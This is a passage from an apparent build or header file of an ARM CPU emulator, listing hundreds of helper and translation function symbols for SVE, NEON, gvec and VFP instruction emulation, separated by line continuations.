helper_sve_umin_zpzz_h \ helper_sve_umin_zpzz_s \ helper_sve_umin_zpzz_d \ helper_sve_sabd_zpzz_b \ helper_sve_sabd_zpzz_h \ helper_sve_sabd_zpzz_s \ helper_sve_sabd_zpzz_d \ helper_sve_uabd_zpzz_b \ helper_sve_uabd_zpzz_h \ helper_sve_uabd_zpzz_s \ helper_sve_uabd_zpzz_d \ helper_sve_mul_zpzz_b \ helper_sve_mul_zpzz_h \ helper_sve_mul_zpzz_s \ helper_sve_mul_zpzz_d \ helper_sve_smulh_zpzz_b \ helper_sve_smulh_zpzz_h \ helper_sve_smulh_zpzz_s \ helper_sve_smulh_zpzz_d \ helper_sve_umulh_zpzz_b \ helper_sve_umulh_zpzz_h \ helper_sve_umulh_zpzz_s \ helper_sve_umulh_zpzz_d \ helper_sve_sdiv_zpzz_s \ helper_sve_sdiv_zpzz_d \ helper_sve_udiv_zpzz_s \ helper_sve_udiv_zpzz_d \ helper_sve_asr_zpzz_b \ helper_sve_lsr_zpzz_b \ helper_sve_lsl_zpzz_b \ helper_sve_asr_zpzz_h \ helper_sve_lsr_zpzz_h \ helper_sve_lsl_zpzz_h \ helper_sve_asr_zpzz_s \ helper_sve_lsr_zpzz_s \ helper_sve_lsl_zpzz_s \ helper_sve_asr_zpzz_d \ helper_sve_lsr_zpzz_d \ helper_sve_lsl_zpzz_d \ helper_sve_asr_zpzw_b \ helper_sve_lsr_zpzw_b \ helper_sve_lsl_zpzw_b \ helper_sve_asr_zpzw_h \ helper_sve_lsr_zpzw_h \ helper_sve_lsl_zpzw_h \ helper_sve_asr_zpzw_s \ helper_sve_lsr_zpzw_s \ helper_sve_lsl_zpzw_s \ helper_sve_cls_b \ helper_sve_cls_h \ helper_sve_cls_s \ helper_sve_cls_d \ helper_sve_clz_b \ helper_sve_clz_h \ helper_sve_clz_s \ helper_sve_clz_d \ helper_sve_cnt_zpz_b \ helper_sve_cnt_zpz_h \ helper_sve_cnt_zpz_s \ helper_sve_cnt_zpz_d \ helper_sve_cnot_b \ helper_sve_cnot_h \ helper_sve_cnot_s \ helper_sve_cnot_d \ helper_sve_fabs_h \ helper_sve_fabs_s \ helper_sve_fabs_d \ helper_sve_fneg_h \ helper_sve_fneg_s \ helper_sve_fneg_d \ helper_sve_not_zpz_b \ helper_sve_not_zpz_h \ helper_sve_not_zpz_s \ helper_sve_not_zpz_d \ helper_sve_sxtb_h \ helper_sve_sxtb_s \ helper_sve_sxth_s \ helper_sve_sxtb_d \ helper_sve_sxth_d \ helper_sve_sxtw_d \ helper_sve_uxtb_h \ helper_sve_uxtb_s \ helper_sve_uxth_s \ helper_sve_uxtb_d \ helper_sve_uxth_d \ helper_sve_uxtw_d \ helper_sve_abs_b \ helper_sve_abs_h \ helper_sve_abs_s \ helper_sve_abs_d \ helper_sve_neg_b \ helper_sve_neg_h \ helper_sve_neg_s \ helper_sve_neg_d \ helper_sve_revb_h \ helper_sve_revb_s \ helper_sve_revb_d \ helper_sve_revh_s \ helper_sve_revh_d \ helper_sve_revw_d \ helper_sve_rbit_b \ helper_sve_rbit_h \ helper_sve_rbit_s \ helper_sve_rbit_d \ helper_sve_asr_zzw_b \ helper_sve_lsr_zzw_b \ helper_sve_lsl_zzw_b \ helper_sve_asr_zzw_h \ helper_sve_lsr_zzw_h \ helper_sve_lsl_zzw_h \ helper_sve_asr_zzw_s \ helper_sve_lsr_zzw_s \ helper_sve_lsl_zzw_s \ helper_sve_orv_b \ helper_sve_orv_h \ helper_sve_orv_s \ helper_sve_orv_d \ helper_sve_eorv_b \ helper_sve_eorv_h \ helper_sve_eorv_s \ helper_sve_eorv_d \ helper_sve_andv_b \ helper_sve_andv_h \ helper_sve_andv_s \ helper_sve_andv_d \ helper_sve_saddv_b \ helper_sve_saddv_h \ helper_sve_saddv_s \ helper_sve_uaddv_b \ helper_sve_uaddv_h \ helper_sve_uaddv_s \ helper_sve_uaddv_d \ helper_sve_smaxv_b \ helper_sve_smaxv_h \ helper_sve_smaxv_s \ helper_sve_smaxv_d \ helper_sve_umaxv_b \ helper_sve_umaxv_h \ helper_sve_umaxv_s \ helper_sve_umaxv_d \ helper_sve_sminv_b \ helper_sve_sminv_h \ helper_sve_sminv_s \ helper_sve_sminv_d \ helper_sve_uminv_b \ helper_sve_uminv_h \ helper_sve_uminv_s \ helper_sve_uminv_d \ helper_sve_subri_b \ helper_sve_subri_h \ helper_sve_subri_s \ helper_sve_subri_d \ helper_sve_smaxi_b \ helper_sve_smaxi_h \ helper_sve_smaxi_s \ helper_sve_smaxi_d \ helper_sve_smini_b \ helper_sve_smini_h \ helper_sve_smini_s \ helper_sve_smini_d \ helper_sve_umaxi_b \ helper_sve_umaxi_h \ helper_sve_umaxi_s \ 
helper_sve_umaxi_d \ helper_sve_umini_b \ helper_sve_umini_h \ helper_sve_umini_s \ helper_sve_umini_d \ helper_sve_pfirst \ helper_sve_pnext \ helper_sve_clr_b \ helper_sve_clr_h \ helper_sve_clr_s \ helper_sve_clr_d \ helper_sve_movz_b \ helper_sve_movz_h \ helper_sve_movz_s \ helper_sve_movz_d \ helper_sve_asr_zpzi_b \ helper_sve_asr_zpzi_h \ helper_sve_asr_zpzi_s \ helper_sve_asr_zpzi_d \ helper_sve_lsr_zpzi_b \ helper_sve_lsr_zpzi_h \ helper_sve_lsr_zpzi_s \ helper_sve_lsr_zpzi_d \ helper_sve_lsl_zpzi_b \ helper_sve_lsl_zpzi_h \ helper_sve_lsl_zpzi_s \ helper_sve_lsl_zpzi_d \ helper_sve_asrd_b \ helper_sve_asrd_h \ helper_sve_asrd_s \ helper_sve_asrd_d \ helper_sve_mla_b \ helper_sve_mls_b \ helper_sve_mla_h \ helper_sve_mls_h \ helper_sve_mla_s \ helper_sve_mls_s \ helper_sve_mla_d \ helper_sve_mls_d \ helper_sve_index_b \ helper_sve_index_h \ helper_sve_index_s \ helper_sve_index_d \ helper_sve_adr_p32 \ helper_sve_adr_p64 \ helper_sve_adr_s32 \ helper_sve_adr_u32 \ helper_sve_fexpa_h \ helper_sve_fexpa_s \ helper_sve_fexpa_d \ helper_sve_ftssel_h \ helper_sve_ftssel_s \ helper_sve_ftssel_d \ helper_sve_sqaddi_b \ helper_sve_sqaddi_h \ helper_sve_sqaddi_s \ helper_sve_sqaddi_d \ helper_sve_uqaddi_b \ helper_sve_uqaddi_h \ helper_sve_uqaddi_s \ helper_sve_uqaddi_d \ helper_sve_uqsubi_d \ helper_sve_cpy_m_b \ helper_sve_cpy_m_h \ helper_sve_cpy_m_s \ helper_sve_cpy_m_d \ helper_sve_cpy_z_b \ helper_sve_cpy_z_h \ helper_sve_cpy_z_s \ helper_sve_cpy_z_d \ helper_sve_ext \ helper_sve_insr_b \ helper_sve_insr_h \ helper_sve_insr_s \ helper_sve_insr_d \ helper_sve_rev_b \ helper_sve_rev_h \ helper_sve_rev_s \ helper_sve_rev_d \ helper_sve_tbl_b \ helper_sve_tbl_h \ helper_sve_tbl_s \ helper_sve_tbl_d \ helper_sve_sunpk_h \ helper_sve_sunpk_s \ helper_sve_sunpk_d \ helper_sve_uunpk_h \ helper_sve_uunpk_s \ helper_sve_uunpk_d \ helper_sve_zip_p \ helper_sve_uzp_p \ helper_sve_trn_p \ helper_sve_rev_p \ helper_sve_punpk_p \ helper_sve_zip_b \ helper_sve_zip_h \ helper_sve_zip_s \ helper_sve_zip_d \ helper_sve_uzp_b \ helper_sve_uzp_h \ helper_sve_uzp_s \ helper_sve_uzp_d \ helper_sve_trn_b \ helper_sve_trn_h \ helper_sve_trn_s \ helper_sve_trn_d \ helper_sve_compact_s \ helper_sve_compact_d \ helper_sve_last_active_element \ helper_sve_splice \ helper_sve_sel_zpzz_b \ helper_sve_sel_zpzz_h \ helper_sve_sel_zpzz_s \ helper_sve_sel_zpzz_d \ helper_sve_cmpeq_ppzz_b \ helper_sve_cmpeq_ppzz_h \ helper_sve_cmpeq_ppzz_s \ helper_sve_cmpeq_ppzz_d \ helper_sve_cmpne_ppzz_b \ helper_sve_cmpne_ppzz_h \ helper_sve_cmpne_ppzz_s \ helper_sve_cmpne_ppzz_d \ helper_sve_cmpgt_ppzz_b \ helper_sve_cmpgt_ppzz_h \ helper_sve_cmpgt_ppzz_s \ helper_sve_cmpgt_ppzz_d \ helper_sve_cmpge_ppzz_b \ helper_sve_cmpge_ppzz_h \ helper_sve_cmpge_ppzz_s \ helper_sve_cmpge_ppzz_d \ helper_sve_cmphi_ppzz_b \ helper_sve_cmphi_ppzz_h \ helper_sve_cmphi_ppzz_s \ helper_sve_cmphi_ppzz_d \ helper_sve_cmphs_ppzz_b \ helper_sve_cmphs_ppzz_h \ helper_sve_cmphs_ppzz_s \ helper_sve_cmphs_ppzz_d \ helper_sve_cmpeq_ppzw_b \ helper_sve_cmpeq_ppzw_h \ helper_sve_cmpeq_ppzw_s \ helper_sve_cmpne_ppzw_b \ helper_sve_cmpne_ppzw_h \ helper_sve_cmpne_ppzw_s \ helper_sve_cmpgt_ppzw_b \ helper_sve_cmpgt_ppzw_h \ helper_sve_cmpgt_ppzw_s \ helper_sve_cmpge_ppzw_b \ helper_sve_cmpge_ppzw_h \ helper_sve_cmpge_ppzw_s \ helper_sve_cmphi_ppzw_b \ helper_sve_cmphi_ppzw_h \ helper_sve_cmphi_ppzw_s \ helper_sve_cmphs_ppzw_b \ helper_sve_cmphs_ppzw_h \ helper_sve_cmphs_ppzw_s \ helper_sve_cmplt_ppzw_b \ helper_sve_cmplt_ppzw_h \ helper_sve_cmplt_ppzw_s \ 
helper_sve_cmple_ppzw_b \ helper_sve_cmple_ppzw_h \ helper_sve_cmple_ppzw_s \ helper_sve_cmplo_ppzw_b \ helper_sve_cmplo_ppzw_h \ helper_sve_cmplo_ppzw_s \ helper_sve_cmpls_ppzw_b \ helper_sve_cmpls_ppzw_h \ helper_sve_cmpls_ppzw_s \ helper_sve_cmpeq_ppzi_b \ helper_sve_cmpeq_ppzi_h \ helper_sve_cmpeq_ppzi_s \ helper_sve_cmpeq_ppzi_d \ helper_sve_cmpne_ppzi_b \ helper_sve_cmpne_ppzi_h \ helper_sve_cmpne_ppzi_s \ helper_sve_cmpne_ppzi_d \ helper_sve_cmpgt_ppzi_b \ helper_sve_cmpgt_ppzi_h \ helper_sve_cmpgt_ppzi_s \ helper_sve_cmpgt_ppzi_d \ helper_sve_cmpge_ppzi_b \ helper_sve_cmpge_ppzi_h \ helper_sve_cmpge_ppzi_s \ helper_sve_cmpge_ppzi_d \ helper_sve_cmphi_ppzi_b \ helper_sve_cmphi_ppzi_h \ helper_sve_cmphi_ppzi_s \ helper_sve_cmphi_ppzi_d \ helper_sve_cmphs_ppzi_b \ helper_sve_cmphs_ppzi_h \ helper_sve_cmphs_ppzi_s \ helper_sve_cmphs_ppzi_d \ helper_sve_cmplt_ppzi_b \ helper_sve_cmplt_ppzi_h \ helper_sve_cmplt_ppzi_s \ helper_sve_cmplt_ppzi_d \ helper_sve_cmple_ppzi_b \ helper_sve_cmple_ppzi_h \ helper_sve_cmple_ppzi_s \ helper_sve_cmple_ppzi_d \ helper_sve_cmplo_ppzi_b \ helper_sve_cmplo_ppzi_h \ helper_sve_cmplo_ppzi_s \ helper_sve_cmplo_ppzi_d \ helper_sve_cmpls_ppzi_b \ helper_sve_cmpls_ppzi_h \ helper_sve_cmpls_ppzi_s \ helper_sve_cmpls_ppzi_d \ helper_sve_brkpa \ helper_sve_brkpas \ helper_sve_brkpb \ helper_sve_brkpbs \ helper_sve_brka_z \ helper_sve_brkas_z \ helper_sve_brkb_z \ helper_sve_brkbs_z \ helper_sve_brka_m \ helper_sve_brkas_m \ helper_sve_brkb_m \ helper_sve_brkbs_m \ helper_sve_brkn \ helper_sve_brkns \ helper_sve_cntp \ helper_sve_while \ helper_sve_faddv_h \ helper_sve_faddv_s \ helper_sve_faddv_d \ helper_sve_fminnmv_h \ helper_sve_fminnmv_s \ helper_sve_fminnmv_d \ helper_sve_fmaxnmv_h \ helper_sve_fmaxnmv_s \ helper_sve_fmaxnmv_d \ helper_sve_fminv_h \ helper_sve_fminv_s \ helper_sve_fminv_d \ helper_sve_fmaxv_h \ helper_sve_fmaxv_s \ helper_sve_fmaxv_d \ helper_sve_fadda_h \ helper_sve_fadda_s \ helper_sve_fadda_d \ helper_sve_fadd_h \ helper_sve_fadd_s \ helper_sve_fadd_d \ helper_sve_fsub_h \ helper_sve_fsub_s \ helper_sve_fsub_d \ helper_sve_fmul_h \ helper_sve_fmul_s \ helper_sve_fmul_d \ helper_sve_fdiv_h \ helper_sve_fdiv_s \ helper_sve_fdiv_d \ helper_sve_fmin_h \ helper_sve_fmin_s \ helper_sve_fmin_d \ helper_sve_fmax_h \ helper_sve_fmax_s \ helper_sve_fmax_d \ helper_sve_fminnum_h \ helper_sve_fminnum_s \ helper_sve_fminnum_d \ helper_sve_fmaxnum_h \ helper_sve_fmaxnum_s \ helper_sve_fmaxnum_d \ helper_sve_fabd_h \ helper_sve_fabd_s \ helper_sve_fabd_d \ helper_sve_fscalbn_h \ helper_sve_fscalbn_s \ helper_sve_fscalbn_d \ helper_sve_fmulx_h \ helper_sve_fmulx_s \ helper_sve_fmulx_d \ helper_sve_fadds_h \ helper_sve_fadds_s \ helper_sve_fadds_d \ helper_sve_fsubs_h \ helper_sve_fsubs_s \ helper_sve_fsubs_d \ helper_sve_fmuls_h \ helper_sve_fmuls_s \ helper_sve_fmuls_d \ helper_sve_fsubrs_h \ helper_sve_fsubrs_s \ helper_sve_fsubrs_d \ helper_sve_fmaxnms_h \ helper_sve_fmaxnms_s \ helper_sve_fmaxnms_d \ helper_sve_fminnms_h \ helper_sve_fminnms_s \ helper_sve_fminnms_d \ helper_sve_fmaxs_h \ helper_sve_fmaxs_s \ helper_sve_fmaxs_d \ helper_sve_fmins_h \ helper_sve_fmins_s \ helper_sve_fmins_d \ helper_sve_fcvt_sh \ helper_sve_fcvt_hs \ helper_sve_fcvt_dh \ helper_sve_fcvt_hd \ helper_sve_fcvt_ds \ helper_sve_fcvt_sd \ helper_sve_fcvtzs_hh \ helper_sve_fcvtzs_hs \ helper_sve_fcvtzs_ss \ helper_sve_fcvtzs_hd \ helper_sve_fcvtzs_sd \ helper_sve_fcvtzs_ds \ helper_sve_fcvtzs_dd \ helper_sve_fcvtzu_hh \ helper_sve_fcvtzu_hs \ helper_sve_fcvtzu_ss \ 
helper_sve_fcvtzu_hd \ helper_sve_fcvtzu_sd \ helper_sve_fcvtzu_ds \ helper_sve_fcvtzu_dd \ helper_sve_frint_h \ helper_sve_frint_s \ helper_sve_frint_d \ helper_sve_frintx_h \ helper_sve_frintx_s \ helper_sve_frintx_d \ helper_sve_frecpx_h \ helper_sve_frecpx_s \ helper_sve_frecpx_d \ helper_sve_fsqrt_h \ helper_sve_fsqrt_s \ helper_sve_fsqrt_d \ helper_sve_scvt_hh \ helper_sve_scvt_sh \ helper_sve_scvt_ss \ helper_sve_scvt_sd \ helper_sve_scvt_dh \ helper_sve_scvt_ds \ helper_sve_scvt_dd \ helper_sve_ucvt_hh \ helper_sve_ucvt_sh \ helper_sve_ucvt_ss \ helper_sve_ucvt_sd \ helper_sve_ucvt_dh \ helper_sve_ucvt_ds \ helper_sve_ucvt_dd \ helper_sve_fmla_zpzzz_h \ helper_sve_fmls_zpzzz_h \ helper_sve_fnmla_zpzzz_h \ helper_sve_fnmls_zpzzz_h \ helper_sve_fmla_zpzzz_s \ helper_sve_fmls_zpzzz_s \ helper_sve_fnmla_zpzzz_s \ helper_sve_fnmls_zpzzz_s \ helper_sve_fmla_zpzzz_d \ helper_sve_fmls_zpzzz_d \ helper_sve_fnmla_zpzzz_d \ helper_sve_fnmls_zpzzz_d \ helper_sve_fcmge_h \ helper_sve_fcmge_s \ helper_sve_fcmge_d \ helper_sve_fcmgt_h \ helper_sve_fcmgt_s \ helper_sve_fcmgt_d \ helper_sve_fcmeq_h \ helper_sve_fcmeq_s \ helper_sve_fcmeq_d \ helper_sve_fcmne_h \ helper_sve_fcmne_s \ helper_sve_fcmne_d \ helper_sve_fcmuo_h \ helper_sve_fcmuo_s \ helper_sve_fcmuo_d \ helper_sve_facge_h \ helper_sve_facge_s \ helper_sve_facge_d \ helper_sve_facgt_h \ helper_sve_facgt_s \ helper_sve_facgt_d \ helper_sve_fcmge0_h \ helper_sve_fcmge0_s \ helper_sve_fcmge0_d \ helper_sve_fcmgt0_h \ helper_sve_fcmgt0_s \ helper_sve_fcmgt0_d \ helper_sve_fcmle0_h \ helper_sve_fcmle0_s \ helper_sve_fcmle0_d \ helper_sve_fcmlt0_h \ helper_sve_fcmlt0_s \ helper_sve_fcmlt0_d \ helper_sve_fcmeq0_h \ helper_sve_fcmeq0_s \ helper_sve_fcmeq0_d \ helper_sve_fcmne0_h \ helper_sve_fcmne0_s \ helper_sve_fcmne0_d \ helper_sve_ftmad_h \ helper_sve_ftmad_s \ helper_sve_ftmad_d \ helper_sve_fcadd_h \ helper_sve_fcadd_s \ helper_sve_fcadd_d \ helper_sve_fcmla_zpzzz_h \ helper_sve_fcmla_zpzzz_s \ helper_sve_fcmla_zpzzz_d \ helper_sve_ld1bb_r \ helper_sve_ld1bhu_r \ helper_sve_ld1bhs_r \ helper_sve_ld1bsu_r \ helper_sve_ld1bss_r \ helper_sve_ld1bdu_r \ helper_sve_ld1bds_r \ helper_sve_ld1hh_le_r \ helper_sve_ld1hh_be_r \ helper_sve_ld1hsu_le_r \ helper_sve_ld1hsu_be_r \ helper_sve_ld1hss_le_r \ helper_sve_ld1hss_be_r \ helper_sve_ld1hdu_le_r \ helper_sve_ld1hdu_be_r \ helper_sve_ld1hds_le_r \ helper_sve_ld1hds_be_r \ helper_sve_ld1ss_le_r \ helper_sve_ld1ss_be_r \ helper_sve_ld1sdu_le_r \ helper_sve_ld1sdu_be_r \ helper_sve_ld1sds_le_r \ helper_sve_ld1sds_be_r \ helper_sve_ld1dd_le_r \ helper_sve_ld1dd_be_r \ helper_sve_ld2bb_r \ helper_sve_ld3bb_r \ helper_sve_ld4bb_r \ helper_sve_ld2hh_le_r \ helper_sve_ld2hh_be_r \ helper_sve_ld3hh_le_r \ helper_sve_ld3hh_be_r \ helper_sve_ld4hh_le_r \ helper_sve_ld4hh_be_r \ helper_sve_ld2ss_le_r \ helper_sve_ld2ss_be_r \ helper_sve_ld3ss_le_r \ helper_sve_ld3ss_be_r \ helper_sve_ld4ss_le_r \ helper_sve_ld4ss_be_r \ helper_sve_ld2dd_le_r \ helper_sve_ld2dd_be_r \ helper_sve_ld3dd_le_r \ helper_sve_ld3dd_be_r \ helper_sve_ld4dd_le_r \ helper_sve_ld4dd_be_r \ helper_sve_ldff1bb_r \ helper_sve_ldnf1bb_r \ helper_sve_ldff1bhu_r \ helper_sve_ldnf1bhu_r \ helper_sve_ldff1bhs_r \ helper_sve_ldnf1bhs_r \ helper_sve_ldff1bsu_r \ helper_sve_ldnf1bsu_r \ helper_sve_ldff1bss_r \ helper_sve_ldnf1bss_r \ helper_sve_ldff1bdu_r \ helper_sve_ldnf1bdu_r \ helper_sve_ldff1bds_r \ helper_sve_ldnf1bds_r \ helper_sve_ldff1hh_le_r \ helper_sve_ldnf1hh_le_r \ helper_sve_ldff1hh_be_r \ helper_sve_ldnf1hh_be_r \ 
helper_sve_ldff1hsu_le_r \ helper_sve_ldnf1hsu_le_r \ helper_sve_ldff1hsu_be_r \ helper_sve_ldnf1hsu_be_r \ helper_sve_ldff1hss_le_r \ helper_sve_ldnf1hss_le_r \ helper_sve_ldff1hss_be_r \ helper_sve_ldnf1hss_be_r \ helper_sve_ldff1hdu_le_r \ helper_sve_ldnf1hdu_le_r \ helper_sve_ldff1hdu_be_r \ helper_sve_ldnf1hdu_be_r \ helper_sve_ldff1hds_le_r \ helper_sve_ldnf1hds_le_r \ helper_sve_ldff1hds_be_r \ helper_sve_ldnf1hds_be_r \ helper_sve_ldff1ss_le_r \ helper_sve_ldnf1ss_le_r \ helper_sve_ldff1ss_be_r \ helper_sve_ldnf1ss_be_r \ helper_sve_ldff1sdu_le_r \ helper_sve_ldnf1sdu_le_r \ helper_sve_ldff1sdu_be_r \ helper_sve_ldnf1sdu_be_r \ helper_sve_ldff1sds_le_r \ helper_sve_ldnf1sds_le_r \ helper_sve_ldff1sds_be_r \ helper_sve_ldnf1sds_be_r \ helper_sve_ldff1dd_le_r \ helper_sve_ldnf1dd_le_r \ helper_sve_ldff1dd_be_r \ helper_sve_ldnf1dd_be_r \ helper_sve_st1bb_r \ helper_sve_st1bh_r \ helper_sve_st1bs_r \ helper_sve_st1bd_r \ helper_sve_st2bb_r \ helper_sve_st3bb_r \ helper_sve_st4bb_r \ helper_sve_st1hh_le_r \ helper_sve_st1hh_be_r \ helper_sve_st1hs_le_r \ helper_sve_st1hs_be_r \ helper_sve_st1hd_le_r \ helper_sve_st1hd_be_r \ helper_sve_st2hh_le_r \ helper_sve_st2hh_be_r \ helper_sve_st3hh_le_r \ helper_sve_st3hh_be_r \ helper_sve_st4hh_le_r \ helper_sve_st4hh_be_r \ helper_sve_st1ss_le_r \ helper_sve_st1ss_be_r \ helper_sve_st1sd_le_r \ helper_sve_st1sd_be_r \ helper_sve_st2ss_le_r \ helper_sve_st2ss_be_r \ helper_sve_st3ss_le_r \ helper_sve_st3ss_be_r \ helper_sve_st4ss_le_r \ helper_sve_st4ss_be_r \ helper_sve_st1dd_le_r \ helper_sve_st1dd_be_r \ helper_sve_st2dd_le_r \ helper_sve_st2dd_be_r \ helper_sve_st3dd_le_r \ helper_sve_st3dd_be_r \ helper_sve_st4dd_le_r \ helper_sve_st4dd_be_r \ helper_sve_ldbsu_zsu \ helper_sve_ldbsu_zss \ helper_sve_ldbdu_zsu \ helper_sve_ldbdu_zss \ helper_sve_ldbdu_zd \ helper_sve_ldbss_zsu \ helper_sve_ldbss_zss \ helper_sve_ldbds_zsu \ helper_sve_ldbds_zss \ helper_sve_ldbds_zd \ helper_sve_ldhsu_le_zsu \ helper_sve_ldhsu_le_zss \ helper_sve_ldhdu_le_zsu \ helper_sve_ldhdu_le_zss \ helper_sve_ldhdu_le_zd \ helper_sve_ldhsu_be_zsu \ helper_sve_ldhsu_be_zss \ helper_sve_ldhdu_be_zsu \ helper_sve_ldhdu_be_zss \ helper_sve_ldhdu_be_zd \ helper_sve_ldhss_le_zsu \ helper_sve_ldhss_le_zss \ helper_sve_ldhds_le_zsu \ helper_sve_ldhds_le_zss \ helper_sve_ldhds_le_zd \ helper_sve_ldhss_be_zsu \ helper_sve_ldhss_be_zss \ helper_sve_ldhds_be_zsu \ helper_sve_ldhds_be_zss \ helper_sve_ldhds_be_zd \ helper_sve_ldss_le_zsu \ helper_sve_ldss_le_zss \ helper_sve_ldsdu_le_zsu \ helper_sve_ldsdu_le_zss \ helper_sve_ldsdu_le_zd \ helper_sve_ldss_be_zsu \ helper_sve_ldss_be_zss \ helper_sve_ldsdu_be_zsu \ helper_sve_ldsdu_be_zss \ helper_sve_ldsdu_be_zd \ helper_sve_ldsds_le_zsu \ helper_sve_ldsds_le_zss \ helper_sve_ldsds_le_zd \ helper_sve_ldsds_be_zsu \ helper_sve_ldsds_be_zss \ helper_sve_ldsds_be_zd \ helper_sve_lddd_le_zsu \ helper_sve_lddd_le_zss \ helper_sve_lddd_le_zd \ helper_sve_lddd_be_zsu \ helper_sve_lddd_be_zss \ helper_sve_lddd_be_zd \ helper_sve_ldffbsu_zsu \ helper_sve_ldffbsu_zss \ helper_sve_ldffbdu_zsu \ helper_sve_ldffbdu_zss \ helper_sve_ldffbdu_zd \ helper_sve_ldffbss_zsu \ helper_sve_ldffbss_zss \ helper_sve_ldffbds_zsu \ helper_sve_ldffbds_zss \ helper_sve_ldffbds_zd \ helper_sve_ldffhsu_le_zsu \ helper_sve_ldffhsu_le_zss \ helper_sve_ldffhdu_le_zsu \ helper_sve_ldffhdu_le_zss \ helper_sve_ldffhdu_le_zd \ helper_sve_ldffhsu_be_zsu \ helper_sve_ldffhsu_be_zss \ helper_sve_ldffhdu_be_zsu \ helper_sve_ldffhdu_be_zss \ helper_sve_ldffhdu_be_zd \ 
helper_sve_ldffhss_le_zsu \ helper_sve_ldffhss_le_zss \ helper_sve_ldffhds_le_zsu \ helper_sve_ldffhds_le_zss \ helper_sve_ldffhds_le_zd \ helper_sve_ldffhss_be_zsu \ helper_sve_ldffhss_be_zss \ helper_sve_ldffhds_be_zsu \ helper_sve_ldffhds_be_zss \ helper_sve_ldffhds_be_zd \ helper_sve_ldffss_le_zsu \ helper_sve_ldffss_le_zss \ helper_sve_ldffsdu_le_zsu \ helper_sve_ldffsdu_le_zss \ helper_sve_ldffsdu_le_zd \ helper_sve_ldffss_be_zsu \ helper_sve_ldffss_be_zss \ helper_sve_ldffsdu_be_zsu \ helper_sve_ldffsdu_be_zss \ helper_sve_ldffsdu_be_zd \ helper_sve_ldffsds_le_zsu \ helper_sve_ldffsds_le_zss \ helper_sve_ldffsds_le_zd \ helper_sve_ldffsds_be_zsu \ helper_sve_ldffsds_be_zss \ helper_sve_ldffsds_be_zd \ helper_sve_ldffdd_le_zsu \ helper_sve_ldffdd_le_zss \ helper_sve_ldffdd_le_zd \ helper_sve_ldffdd_be_zsu \ helper_sve_ldffdd_be_zss \ helper_sve_ldffdd_be_zd \ helper_sve_stbs_zsu \ helper_sve_sths_le_zsu \ helper_sve_sths_be_zsu \ helper_sve_stss_le_zsu \ helper_sve_stss_be_zsu \ helper_sve_stbs_zss \ helper_sve_sths_le_zss \ helper_sve_sths_be_zss \ helper_sve_stss_le_zss \ helper_sve_stss_be_zss \ helper_sve_stbd_zsu \ helper_sve_sthd_le_zsu \ helper_sve_sthd_be_zsu \ helper_sve_stsd_le_zsu \ helper_sve_stsd_be_zsu \ helper_sve_stdd_le_zsu \ helper_sve_stdd_be_zsu \ helper_sve_stbd_zss \ helper_sve_sthd_le_zss \ helper_sve_sthd_be_zss \ helper_sve_stsd_le_zss \ helper_sve_stsd_be_zss \ helper_sve_stdd_le_zss \ helper_sve_stdd_be_zss \ helper_sve_stbd_zd \ helper_sve_sthd_le_zd \ helper_sve_sthd_be_zd \ helper_sve_stsd_le_zd \ helper_sve_stsd_be_zd \ helper_sve_stdd_le_zd \ helper_sve_stdd_be_zd \ arm_cpu_do_unaligned_access \ arm_cpu_do_transaction_failed \ arm_cpu_tlb_fill \ a64_translate_init \ gen_a64_set_pc_im \ unallocated_encoding \ new_tmp_a64 \ new_tmp_a64_zero \ cpu_reg \ cpu_reg_sp \ read_cpu_reg \ read_cpu_reg_sp \ write_fp_dreg \ get_fpstatus_ptr \ sve_access_check \ logic_imm_decode_wmask \ arm_translate_init \ arm_test_cc \ arm_free_cc \ arm_jump_cc \ arm_gen_test_cc \ vfp_expand_imm \ gen_cmtst_i64 \ gen_ushl_i32 \ gen_ushl_i64 \ gen_sshl_i32 \ gen_sshl_i64 \ gen_intermediate_code \ restore_state_to_opc \ disas_sve \ helper_neon_qrdmlah_s16 \ helper_gvec_qrdmlah_s16 \ helper_neon_qrdmlsh_s16 \ helper_gvec_qrdmlsh_s16 \ helper_neon_qrdmlah_s32 \ helper_gvec_qrdmlah_s32 \ helper_neon_qrdmlsh_s32 \ helper_gvec_qrdmlsh_s32 \ helper_gvec_sdot_b \ helper_gvec_udot_b \ helper_gvec_sdot_h \ helper_gvec_udot_h \ helper_gvec_sdot_idx_b \ helper_gvec_udot_idx_b \ helper_gvec_sdot_idx_h \ helper_gvec_udot_idx_h \ helper_gvec_fcaddh \ helper_gvec_fcadds \ helper_gvec_fcaddd \ helper_gvec_fcmlah \ helper_gvec_fcmlah_idx \ helper_gvec_fcmlas \ helper_gvec_fcmlas_idx \ helper_gvec_fcmlad \ helper_gvec_frecpe_h \ helper_gvec_frecpe_s \ helper_gvec_frecpe_d \ helper_gvec_frsqrte_h \ helper_gvec_frsqrte_s \ helper_gvec_frsqrte_d \ helper_gvec_fadd_h \ helper_gvec_fadd_s \ helper_gvec_fadd_d \ helper_gvec_fsub_h \ helper_gvec_fsub_s \ helper_gvec_fsub_d \ helper_gvec_fmul_h \ helper_gvec_fmul_s \ helper_gvec_fmul_d \ helper_gvec_ftsmul_h \ helper_gvec_ftsmul_s \ helper_gvec_ftsmul_d \ helper_gvec_recps_h \ helper_gvec_recps_s \ helper_gvec_recps_d \ helper_gvec_rsqrts_h \ helper_gvec_rsqrts_s \ helper_gvec_rsqrts_d \ helper_gvec_fmul_idx_h \ helper_gvec_fmul_idx_s \ helper_gvec_fmul_idx_d \ helper_gvec_fmla_idx_h \ helper_gvec_fmla_idx_s \ helper_gvec_fmla_idx_d \ helper_gvec_uqadd_b \ helper_gvec_uqadd_h \ helper_gvec_uqadd_s \ helper_gvec_sqadd_b \ helper_gvec_sqadd_h \ 
helper_gvec_sqadd_s \ helper_gvec_uqsub_b \ helper_gvec_uqsub_h \ helper_gvec_uqsub_s \ helper_gvec_sqsub_b \ helper_gvec_sqsub_h \ helper_gvec_sqsub_s \ helper_gvec_uqadd_d \ helper_gvec_uqsub_d \ helper_gvec_sqadd_d \ helper_gvec_sqsub_d \ helper_gvec_fmlal_a32 \ helper_gvec_fmlal_a64 \ helper_gvec_fmlal_idx_a32 \ helper_gvec_fmlal_idx_a64 \ helper_gvec_sshl_b \ helper_gvec_sshl_h \ helper_gvec_ushl_b \ helper_gvec_ushl_h \ helper_gvec_pmul_b \ helper_gvec_pmull_q \ helper_neon_pmull_h \ helper_sve2_pmull_h \ helper_vfp_get_fpscr \ vfp_get_fpscr \ helper_vfp_set_fpscr \ vfp_set_fpscr \ helper_vfp_adds \ helper_vfp_addd \ helper_vfp_subs \ helper_vfp_subd \ helper_vfp_muls \ helper_vfp_muld \ helper_vfp_divs \ 